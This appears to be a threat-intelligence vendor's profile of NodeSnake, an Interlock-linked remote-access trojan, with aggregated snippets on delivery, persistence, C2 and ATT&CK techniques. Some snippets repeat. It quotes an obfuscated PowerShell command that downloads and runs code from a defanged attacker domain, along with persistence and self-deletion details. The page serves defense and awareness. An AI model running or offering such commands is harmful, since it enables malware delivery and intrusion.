NodeSnake is a remote-access trojan and persistent-access backdoor associated with the Interlock ransomware operation, tracked by IBM X-Force as Hive0163. It commonly serves as an early-stage component in Interlock intrusions, executing shell commands, establishing persistence, and retrieving and launching additional malware, including InterlockRAT. NodeSnake has been deployed against education organizations, including multiple U.K. universities, and has maintained access during prolonged intrusions preceding data theft and ransomware deployment.
NodeSnake includes JavaScript implementations running under Node.js, Java implementations, and native C++ Windows payloads. Its capabilities include interactive shell access, command execution, host profiling, file transfer, SOCKS5 proxying, self-update, self-deletion, and operator-controlled connection management. Command-and-control implementations use HTTP POST requests or encrypted WebSocket communications, with some variants using disposable Cloudflare Tunnel relays and fallback infrastructure. Native Windows variants additionally support TCP tunneling, thread execution hijacking, and anti-debugging checks. A variant observed in July 2026 added screenshot collection.
Delivery campaigns use ClickFix social engineering to persuade victims to execute malicious PowerShell commands that download the malware. NodeSnake shares code logic and infrastructure with the JunkFiction downloader and InterlockRAT and operates within a broader malware deployment framework. Although it supports ransomware intrusions, NodeSnake is an access and remote-control component rather than the ransomware encryptor itself.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Noteworthy tactics, techniques, and procedures (TTPs) include the use of ClickFix-style social-engineering methods, a custom-built remote-access trojan (RAT) called "NodeSnake" or (alternately) "Interlock RAT," and a PHP-based backdoor for cross-platform persistence.
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Interlock’s toolset includes NodeSnake, InterlockRAT, and other custom malware.
Noteworthy tactics, techniques, and procedures (TTPs) include the use of ClickFix-style social-engineering methods, a custom-built remote-access trojan (RAT) called "NodeSnake" or (alternately) "Interlock RAT," and a PHP-based backdoor for cross-platform persistence.
Beginning in early July 2026, the Blackpoint APG has identified the NodeSnake RAT being deployed again, with more than 5 incidents in the previous 14 days.
The attack in itself is said to have leveraged the ClickFix social engineering tactic to trick the victim into running a PowerShell command, which then downloads NodeSnake, a known malware attributed to Hive0163. A first-stage component, NodeSnake, is designed to run shell commands, establish persistence, and retrieve and launch a wider malware framework referred to as Interlock RAT.
28 distinct techniques documented for this family, organized by ATT&CK tactic.
The Interlock ransomware operation surfaced in September 2024 and has been linked to ClickFix and to malware attacks in which they deployed a remote access trojan called NodeSnake on the networks of multiple U.K. universities.
Initial Access | T1189 - Drive-by Compromise On Day 1 of the attack, an end-user device was linked by a ChatGPT search for Dynamics 365 to a reputable web property that is believed to have been compromised at the time with a ClickFix lure.
By day three, the attackers used a compromised domain administrator account to create a scheduled task on a print server. Scheduled task \Microsoft\Windows\Defrag\ScheduledDefrags Scheduled task created for persistence
Persistence | T1053.005 - Scheduled Task/Job:Scheduled Task On Day 3, the threat actor, using the compromised domain administrator account, executed the following command line instruction on a print server to create a scheduled task which executed persistence malware debug.log via node.exe
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w H -c "$s='irm dnsgo-windowsds[.]live/nlOs24YoL';iex ([string]::Join('|', $s, 'iex'))"
TERMINAL 0xa0 Interactive cmd.exe shell; TERMINAL_COMMAND 0xa1 One-shot cmd.exe /c... output to C:\Users\Public\<random>.txt
The malicious component on disk is a text file, debug.txt, which Node runs regardless of extension.
By day three, the attackers used a compromised domain administrator account to create a scheduled task on a print server. Scheduled task \Microsoft\Windows\Defrag\ScheduledDefrags Scheduled task created for persistence
Persistence | T1053.005 - Scheduled Task/Job:Scheduled Task On Day 3, the threat actor, using the compromised domain administrator account, executed the following command line instruction on a print server to create a scheduled task which executed persistence malware debug.log via node.exe
By day three, the attackers used a compromised domain administrator account to create a scheduled task on a print server. Scheduled task \Microsoft\Windows\Defrag\ScheduledDefrags Scheduled task created for persistence
Persistence | T1053.005 - Scheduled Task/Job:Scheduled Task On Day 3, the threat actor, using the compromised domain administrator account, executed the following command line instruction on a print server to create a scheduled task which executed persistence malware debug.log via node.exe
$s holds only the irm half and [string]::Join('|', $s, 'iex') assembles irm dnsgo-windowsds[.]live/nlOs24YoL|iex at runtime for the outer iex to run.
Persistence was an HKCU Run key named ChromeUpdater ... the value name borrows Chrome's updater.
Thread execution hijacking : uses SetThreadContext / GetThreadContext to inject into running threads.
DELETE 0x0c fs.rmSync(__filename)... If the counter passes 40, the implant deletes itself... self-deleting scheduled task... --delete (self-delete after encryption)
A DirectorySearcher retrieves every computer object from Active Directory and examines each description for VB, VEEA, BCK, and BACK.
The PowerShell script functions as a full-fledged backdoor that can beacon a heartbeat message containing system information to a C2 server every 30 seconds, poll for a new command every 50 seconds, execute it via "cmd.exe," and relay the results back to the server.
The implant connects over ws:// and rotates across nine Cloudflare Tunnel domains plus three fallback IP addresses... All three tiers use the same transport protocol... RC4-encrypted WebSocket framing.
The channel is a SOCKS proxy, so the operator can reach anything the workstation can.
Operator commands. The implant supports 12 message types: SOCKS5 0x05 SOCKS5 proxy... The native implant runs a multi-threaded design: SocksThread SOCKS4 proxy handler Socks5Thread SOCKS5 proxy handler
The C2 infrastructure runs through free Cloudflare Tunnel endpoints as disposable WebSocket relays, falling back to hardcoded IPs on hosting providers.
The transport is a raw TCP socket on 443 with no TLS on top.
Once inside, attackers use traffic distribution systems to redirect victims and deliver payloads through ClickFix-style attacks or fake browser updates. | NodeSnake, which acts as the first stage loader in most Interlock infections, shares code logic and server addresses with both JunkFiction downloader and InterlockRAT.
27 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
16 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A remote-access trojan deployed through a ClickFix sub-campaign and explicitly tied to the Interlock ransomware operation. Its command-and-control resolves active infrastructure through an Ethereum smart contract.
Named as part of Interlock's toolset in the campaign.
A custom-built remote access trojan used by the Interlock ransomware group for persistence and remote access during intrusions.
A remote access trojan tied in the content to the Interlock Ransomware operation, delivered via ClickFix-style attacks and described as evolving with a new screenshot collection module.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.